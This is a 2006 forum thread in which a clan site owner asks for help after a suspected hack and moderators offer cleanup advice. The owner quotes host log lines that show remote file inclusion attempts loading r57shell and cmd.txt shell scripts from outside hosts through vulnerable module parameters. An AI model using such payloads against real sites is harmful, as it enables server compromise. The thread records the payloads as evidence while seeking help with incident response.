Website Hacked?

ivellios · New Member Joined: Dec 02, 2006 Posts: 2

Hi Guys!

I have been having some issues with my site lately. KZNClan.com we are a BF2 gaming clan and love your distro.

I am running the latest distro of raven, but I added vwar hiwire from phpnuke-clan. So far I am thinking that that is the problem. We continually get a 400 error message when ever we are leaving the homepage.

First, what is the best way to stop this from happening? Will it help to ban by country as I have seen suggested here?

Second, How can I fix this? I can manipulate the code after I figure out what I am looking for but I am definitely not a script writer. So it usually takes me a few tries to figure out what the script I manipulate is doing. That is my level of experience.

Right now I am thinking that it would be best to upload new copies of everything and then transfer the site to that directory. Will this work?

Lastly, I have to do something quick before 1and1 shuts me down. While we have been busy these last 2 months, we love your product and feel badly about waiting so long to donate. If you can find the time to help me in this problem I will make sure to rectify this oversight and then some.

Here is a part of the e-mail from my host:

access.log.current:201.78.123.141 - - [07/Dec/2006:06:18:54 -0500] "GET
/modules.php?name=News&file=http://schralprider.com/cp/agatsuma/CMD/
r57shell.txt? HTTP/1.1" 200 71 s180249571.onlinehome.us "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; pt-BR) Opera 8.54" "-"

access.log.current:72.232.53.210 - - [28/Nov/2006:13:30:24 -0500]
"GET/modules/vwar/admin/admin.php?vwar_root=http://fuxed.by.ru/cmd.txt?H
TTP/1.1" 200 609

Only registered users can see links on this board!
Get registered or login to the forums!

"-""libwww-perl/5.805" "-"

If there is anymore info you need please let me know.

fkelly · Posted: Thu Dec 07, 2006 1:10 pm

It appears from what you've posted that hackers may have used a hole in your system, perhaps one associated with vwar, to stick a shell script on your system. That's what the r57shell.txt thing is if I'm not mistaken. You might want to use your host's file manager via Vdeck or Cpanel or whatever you have to look thru all the directories and try to locate this and any similar files. Then get rid of them and any modules you've added.

Then, yes you can reload your distribution but it's not going to do any good to do this if you still have programs with security holes there. The hackers will still find them and exploit them.

evaders99 · Moderator Joined: Apr 30, 2004 Posts: 2758

"We continually get a 400 error message when ever we are leaving the homepage."

Hmm what page is it going to? That generally doesn't indicate a hacker

However the logs provided do indicate a hack attempt. I'm not surprised if it was vWar that was attacked. It is possible your site may be compromised, your host will need to look at all processes on the server to see if any are malacious. I've seen a lot of bot scripts that will hide as innocent system processes like bash or ls

ivellios · New Member Joined: Dec 02, 2006 Posts: 2

Well if you go to our site and try to go anywhere but the homepage it will show you.

I can go to the admin file though.

evaders99 · Moderator Joined: Apr 30, 2004 Posts: 2758

Code:

INTERNAL SERVER ERROR

An internal server error has occured!

This is where you will need to go to your server's error logs or ask your host.

gregexp · Posted: Fri Dec 08, 2006 5:41 pm

Hmm, Is there anything writing to .htaccess?

Most of the time I personally have seen this error has been due to the .htaccess having something written in it that apache conflicts with.

All previous mentioned advice will lead you to this if it is the case, but thought I would drop it in Just incase you're finding it difficult.